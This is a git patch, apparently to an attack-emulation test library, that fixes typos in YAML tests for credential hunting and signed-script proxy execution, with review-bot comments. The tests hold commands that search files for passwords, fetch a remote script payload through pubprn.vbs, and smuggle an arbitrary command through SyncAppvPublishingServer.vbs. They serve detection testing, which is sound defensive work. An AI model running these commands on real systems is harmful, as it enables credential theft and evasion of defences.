From dd4783b2a5c7eec01d5f3434054328d2cb358b9d Mon Sep 17 00:00:00 2001 From: Brian Thacker Date: Tue, 11 Feb 2020 15:36:21 -0600 Subject: [PATCH] Fixed typo 1216 1081 (#830) * Typo Test 3 findstr /si pass *.xml | *.doc | *.txt | *.xls -> findstr /si pass *.xml *.doc *.txt *.xls * Typo Test 2 SyncAppvPublishingServe -> SyncAppvPublishingServer Quotes in test 2 of a format not recognizable by Powershell when passed. Changed to regular quotes. --- atomics/T1081/T1081.yaml | 2 +- atomics/T1216/T1216.yaml | 6 +++--- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/atomics/T1081/T1081.yaml b/atomics/T1081/T1081.yaml index bc2deeae..01688165 100644 --- a/atomics/T1081/T1081.yaml +++ b/atomics/T1081/T1081.yaml @@ -40,7 +40,7 @@ atomic_tests: name: powershell elevation_required: false command: | - findstr /si pass *.xml | *.doc | *.txt | *.xls + findstr /si pass *.xml *.doc *.txt *.xls ls -R | select-string -Pattern password - name: Access unattend.xml diff --git a/atomics/T1216/T1216.yaml b/atomics/T1216/T1216.yaml index 380f3e80..6aa42647 100644 --- a/atomics/T1216/T1216.yaml +++ b/atomics/T1216/T1216.yaml @@ -22,9 +22,9 @@ atomic_tests: command: | cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:#{remote_payload}" -- name: SyncAppvPublishingServe Signed Script PowerShell Command Execution +- name: SyncAppvPublishingServer Signed Script PowerShell Command Execution description: | - Executes the signed SyncAppvPublishingServe script with options to execute an arbitrary PowerShell command. + Executes the signed SyncAppvPublishingServer script with options to execute an arbitrary PowerShell command. supported_platforms: - windows 
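Review bot: The corrected `findstr /si pass *.xml *.doc *.txt *.xls` line in atomics/T1081/T1081.yaml still searches recursively from whatever directory the executor starts in, so the test's runtime and telemetry vary by host and runner. Nothing in the hunk pins or documents that starting directory, and the following `ls -R | select-string -Pattern password` has the same dependency. Consider saying so in the test's description, e.g. `Searches the current working directory recursively; run from a directory seeded with sample files for repeatable results.` Matching lines are echoed to the console, so on a real workstation the execution log may end up holding live credentials and should be handled accordingly. The test entry begins above the hunk, so an existing description may already cover part of this.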
@@ -39,7 +39,7 @@ atomic_tests: name: command_prompt elevation_required: false command: | - C:\windows\system32\SyncAppvPublishingServe.vbs “\n;#{command_to_execute}” + C:\windows\system32\SyncAppvPublishingServer.vbs "\n;#{command_to_execute}" - name: manage-bde.wsf Signed Script Command Execution description: |
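Review bot: The new command starts `C:\windows\system32\SyncAppvPublishingServer.vbs` by path alone, so the script host that runs it depends on the machine's `.vbs` file association, whereas the pubprn test earlier in this file names `cscript.exe /b` explicitly. On hosts where that association has been changed or Windows Script Host is disabled, the test will presumably not run as intended, and the process lineage a detection should expect is left undefined. I would document the expected host in the description, e.g. `Relies on the default .vbs association (normally wscript.exe).`, or name the host in the command for consistency with the pubprn test. Separately, the commit message attributes the quote problem to PowerShell while the executor in this hunk is `command_prompt`, so it is worth confirming the test was re-run under that executor.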